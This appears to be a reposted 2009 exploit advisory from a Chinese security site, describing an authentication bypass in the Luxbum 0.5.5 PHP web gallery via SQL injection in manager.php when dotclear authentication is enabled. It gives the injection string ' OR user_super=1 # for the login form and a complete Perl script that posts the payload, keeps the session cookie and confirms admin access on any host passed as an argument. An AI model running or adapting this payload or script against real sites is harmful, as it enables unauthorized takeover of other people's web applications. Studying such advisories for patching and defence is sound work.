首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Luxbum 0.5.5/stable (Auth Bypass) SQL Injection Vulnerability
来源:knxone[at]webmail(d0t)ru 作者:knxone 发布时间:2009-05-09  

 __                                              
/\ \                                             
\ \ \/'\     ___    __  _   ___     ___      __  
 \ \ , <   /' _ `\ /\ \/'\ / __`\ /' _ `\  /'__`\
  \ \ \\`\ /\ \/\ \\/>  <//\ \L\ \/\ \/\ \/\  __/
   \ \_\ \_\ \_\ \_\/\_/\_\ \____/\ \_\ \_\ \____\
    \/_/\/_/\/_/\/_/\//\/_/\/___/  \/_/\/_/\/____/
        Better to be alone than in bad company

 

 

+============+
| MAIN INFOS |
+============+

Software name: luxbum (PHP Web gallery)
Version: 0.5.5/stable
Flaw type: sql injection -> auth bypass          
URL:  http://www.luxbum.net/
Found by: knxone <knxone[at]webmail(d0t)ru>
Greetings: _Pirata_ from this famous irc server ;)

 

+=========+
| CONCEPT |
+=========+

Luxbum allows authentification using dotclear username and password via MySQL,
while the default auth mechanism uses a md5 hash of the pass in a PHP file.

If you trace all the code from login form to admin panel, you'll notice that
user input isn't filtered in manager.php or mysql.inc.php.

So if you use dotclear auth in luxbum, SQL injection is possible but, in order
to bypass, we need to return at least one row to get it working and it has to
be a dotclear admin.

In dotclear, the table dc_user stores in the column "user_super" the super
admin status. If it's == 1 then the user is super-admin. Since the luxbum auth
mechanism already fully accesses to dotclear users' data , exploiting is
very easy and doesn't require the disclosure of dotclear database infos (DB
name, username, pass, prefix etc.).

 

+=========+
| EXPLOIT |
+=========+

- requires magic_quotes = Off
- requires use of dotclear auth (not default)
 

Go to:             http://host/luxbum/manager.php
Enter as Username: ' OR user_super=1 #
Enter as Password: xxxxxxxxxxxxxxxxxxxx

 

+==============+
| EXPLOIT CODE |
+==============+

#!/usr/bin/perl -w
# luxbum 0.5.5 auth bypass via sql injection.
# requires magic_quotes Off and use of dotclear auth
# returns 0 if successful, else 1
# ./luxbum http://host.tld/luxbumrootdir
# By knxone <knxone[at]webmail(d0t)ru>
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use Term::ANSIColor qw(:constants);
$Term::ANSIColor::AUTORESET = 1;
help() if ( ! defined($ARGV[0]) || scalar(@ARGV) != 1 );


my $ua = LWP::UserAgent->new(
 agent      => 'Mozilla/4.73 [en] (U; Windows 3.1; Internet Explorer 2.0)',
 cookie_jar => HTTP::Cookies->new(
  file           => ".cookies",
  autosave       => 1      
 )
);
my $url = $ARGV[0]."/manager.php?p=login";

# First we inject to open a valid session
my $req = HTTP::Request->new( POST => $url ) ;
$req->content_type("application/x-www-form-urlencoded");
$req->content("username='+OR+user_super%3D1%23&password=".'x'x32);
my $response = $ua->request($req);
if ( ! $response->is_error && $response->content !~ m/message_ko/ ) {
 print BOLD GREEN "Auth bypass successful :-)\n";
} else {
 print BOLD RED "Auth bypass failed :-(\n";
 exit(1);
}


# Then we check if we've really done it
$response = $ua->get($ARGV[0]."/manager.php");
if ( $response->content =~ m/h1_admin/ ) {
 print BOLD GREEN "Access Granted as gallery Admin at ".$ARGV[0]." :-)))\n";
 exit(0);
} else {
 print BOLD RED "Access Denied at ".$ARGV[0]." :-(\n";
 exit(1);
}


sub help {
 print "Usage: ".$0." http://host.tld/luxbumrootdir\n";
 exit(1);
}

#EOF


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ViPlay3 <= 3.00 (.vpl) Local S
·Mortbay Jetty <= 7.0.0-pre5 Di
·RTWebalbum 1.0.462 (AlbumID) B
·TinyWebGallery <= 1.7.6 LFI /
·TYPSoft FTP Server 1.11 (ABORT
·Mereo 1.8.0 Arbitrary File Dis
·PHP mb_ereg(i)_replace() Evalu
·eggBlog <= 4.1.1 Local Directo
·Sorinara Streaming Audio Playe
·microTopic v1 (rating) Remote
·Job Script 2.0 Arbitrary Chang
·MPLAB IDE 8.30 (.mcp) Universa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved